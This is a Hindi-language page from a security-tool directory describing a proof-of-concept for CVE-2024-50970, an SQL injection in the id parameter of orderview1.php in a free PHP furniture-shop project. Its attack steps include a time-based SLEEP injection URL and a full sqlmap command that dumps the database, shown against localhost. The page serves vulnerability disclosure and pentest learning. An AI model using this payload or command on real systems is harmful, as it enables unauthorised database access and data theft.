Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-50970 — CVE-2024-50970 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Itsourcecode Online Furniture Shopping Project 1.0 में SQL इंजेक्शन। orderview1.php में id पैरामीटर के माध्यम से शोषण का प्रदर्शन, टाइम-बेस्ड पेलोड और SQLMap एकीकरण के साथ। | Kitploit
उपकरण/GitHubGitHub/akhlak2511/cve-2024-50970
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

CVE-2024-50970 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Itsourcecode Online Furniture Shopping Project 1.0 में SQL इंजेक्शन। orderview1.php में id पैरामीटर के माध्यम से शोषण का प्रदर्शन, टाइम-बेस्ड पेलोड और SQLMap एकीकरण के साथ।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50970

विवरण

Itsourcecode Online Furniture Shopping Project 1.0 के orderview1.php में एक SQL इंजेक्शन भेद्यता रिमोट हमलावरों को id पैरामीटर के माध्यम से मनमानी SQL कमांड निष्पादित करने की अनुमति देती है।

भेद्यता प्रकार

SQL इंजेक्शन

उत्पाद विक्रेता

Itsourcecode

प्रभावित उत्पाद कोड बेस:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

प्रभावित घटक:

Itsourcecode Online Furniture Shopping v1.0 orderview1.php पेज में id पैरामीटर के माध्यम से SQL इंजेक्शन के लिए असुरक्षित है।

हमले के वेक्टर:

  1. एप्लिकेशन को स्थानीय रूप से सेट करें, एक खाता पंजीकृत करें, और नए पंजीकृत खाते से लॉग इन करें।
  2. अपने ब्राउज़र में निम्नलिखित URL पर जाएँ: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. SQL पेलोड इंजेक्ट करें: URL में id पैरामीटर को संशोधित करके समय-आधारित SQL इंजेक्शन पेलोड शामिल करें। http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  4. एप्लिकेशन प्रतिक्रिया देखें: यदि इंजेक्शन सफल होता है तो पेज को लोड होने में काफी अधिक समय (10 सेकंड) लगना चाहिए, जो पुष्टि करता है कि id पैरामीटर SQL इंजेक्शन के लिए असुरक्षित है।
  5. अब SQLMap टूल का उपयोग करके आगे शोषण और डेटाबेस डंपिंग के लिए नीचे दिए गए कमांड का उपयोग करें: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast

संदर्भ:

  1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
  2. https://owasp.org/www-community/attacks/SQL_Injection
टूल डाउनलोड करें